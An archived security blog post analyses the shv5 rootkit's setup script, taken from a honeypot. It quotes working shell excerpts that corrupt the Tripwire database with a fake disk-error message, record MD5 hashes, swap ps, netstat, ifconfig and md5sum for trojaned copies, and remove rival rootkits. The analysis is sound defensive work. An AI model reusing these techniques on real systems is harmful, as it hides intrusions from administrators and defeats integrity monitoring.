This Blog has Moved!

This blog is moving to


Thank you for visiting! Content will remain here for archival purposes.

Bypassing Tripwire and MD5 Hash Checking for Advanced Persistent Threats

Reviewing some of the malware setup scripts I've collected through my honeypot, the following code really caught my attention.  This code is from the shv5 rootkit, which was released in 2010, and is detected by most antivirus scanners.

echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire... ${RES}"

uname=`uname -n`
twd=/var/lib/tripwire/$uname.twd

if [ -d /etc/tripwire ]; then
echo "${WHI} ALERT: TRIPWIRE FOUND! ${RES}"

if [ -f /var/lib/tripwire/$uname.twd ]; then
chattr -isa $twd
echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire-database... ${RES}"
echo "${RED} ALERT! tripwire database found ${RES}"
echo "${DCYN}[${WHI}sh${DCYN}]# ${WHI} dun worry we got handy-tricks for this :) ${RES}"
echo "-----------------------------------------" > $twd
echo "Tripwire segment-faulted !" >> $twd
echo "-----------------------------------------" >> $twd
echo "" >> $twd
echo "The reasons for this may be: " >> $twd
echo "" >> $twd
echo "corrupted disc-geometry, possible bad disc-sectors" >> $twd
echo "corrupted files while checking for possible change etc." >> $twd
echo ""
echo "pls. rerun tripwire to build the database again!" >> $twd
echo "" >> $twd
else
echo "${WHI} lucky you: Tripwire database not found. ${RES}"
fi
else
echo "${WHI} guess not. ${RES}"
fi

For those not familiar with it, Tripwire is designed to monitor system files for unauthorized tampering.

The above code, in all its simplistic glory, effectively negates any protection offered by Tripwire.  It does so by simply corrupting the Tripwire database, and making the administrator think it was due to a disk error.

The same malware setup later on records the MD5 hash of certain key system files prior to installing the malware.
# Say hello to md5sum fixer boys n gurls !

if [ -f /sbin/ifconfig ]; then
/usr/bin/md5sum /sbin/ifconfig >> .shmd5
fi
if [ -f /bin/ps ]; then
/usr/bin/md5sum /bin/ps >> .shmd5
fi
if [ -f /bin/ls ]; then
/usr/bin/md5sum /bin/ls >> .shmd5
fi
if [ -f /bin/netstat ]; then
/usr/bin/md5sum /bin/netstat >> .shmd5
fi
if [ -f /usr/bin/find ]; then
/usr/bin/md5sum /usr/bin/find >> .shmd5
fi
if [ -f /usr/bin/top ]; then
/usr/bin/md5sum /usr/bin/top >> .shmd5
fi
if [ -f /usr/sbin/lsof ]; then
/usr/bin/md5sum /usr/sbin/lsof >> .shmd5
fi
if [ -f /usr/bin/slocate ]; then
/usr/bin/md5sum /usr/bin/slocate >> .shmd5
fi
if [ -f /usr/bin/dir ]; then
/usr/bin/md5sum /usr/bin/dir >> .shmd5
fi
if [ -f /usr/bin/md5sum ]; then
/usr/bin/md5sum /usr/bin/md5sum >> .shmd5
fi

The setup then continues to backup current system files and replace them with malware-infected copies:
# Backdoor ps/top/du/ls/netstat/etc..

cd $BASEDIR/bin

BACKUP=/usr/lib/libsh/.backup
mkdir $BACKUP

# ps ...
if [ -f /usr/bin/ps ]; then
chattr -isa /usr/bin/ps
cp /usr/bin/ps $BACKUP
mv -f ps /usr/bin/ps
chattr +isa /usr/bin/ps
fi

if [ -f /bin/ps ]; then
chattr -isa /bin/ps
cp /bin/ps $BACKUP
mv -f ps /bin/ps
chattr +isa /bin/ps
fi

# ifconfig ...
chattr -isa /sbin/ifconfig
cp /sbin/ifconfig $BACKUP
mv -f ifconfig /sbin/ifconfig
chattr +isa /sbin/ifconfig

# netstat ...
if [ -f /usr/sbin/netstat ]; then
chattr -isa /usr/sbin/netstat
mv -f netstat /usr/sbin/netstat
chattr +isa /usr/sbin/netstat
fi
The md5 tool is even replaced with a custom copy, designed to return the original hash values recorded earlier:
# md5sum ...
chattr -isa /usr/bin/md5sum
cp /usr/bin/md5sum $BACKUP
mv -f md5sum /usr/bin/md5sum
chattr +isa /usr/bin/md5sum

Now that the attacker has a silent foothold on the system, the setup script proceeds to check for potentially vulnerable services, as well as even check for other rootkits:

# CHECKING FOR HOSTILE ROOTKITS/BACKDORS
mkdir $HOMEDIR/.owned
if [ -f /etc/ttyhash ]; then
chattr -AacdisSu /etc/ttyhash
rm -rf /etc/ttyhash
fi
if [ -d /lib/ldd.so ]; then
chattr -isa /lib/ldd.so
chattr -isa /lib/ldd.so/*
mv /lib/ldd.so $HOMEDIR/.owned/tk8
echo "${RED}[${WHI}sh${RED}]# tk8 detected and owned ...!!!! ${RES}"
fi
if [ -d /usr/src/.puta ]; then
chattr -isa /usr/src/.puta
chattr -isa /usr/src/.puta/*
mv /usr/src/.puta $HOMEDIR/.owned/tk7
echo "${RED}[${WHI}sh${RED}]# tk7 detected and owned ...!!!! ${RES}"
fi

Make no mistake - today's attackers are smart.  They will do whatever they can to keep a foothold on compromised systems, including blocking access by other attackers.

If you're interested in seeing more, you can view the full setup script at the CaffSec Malware Analysis Google Code site.

No comments:

Post a Comment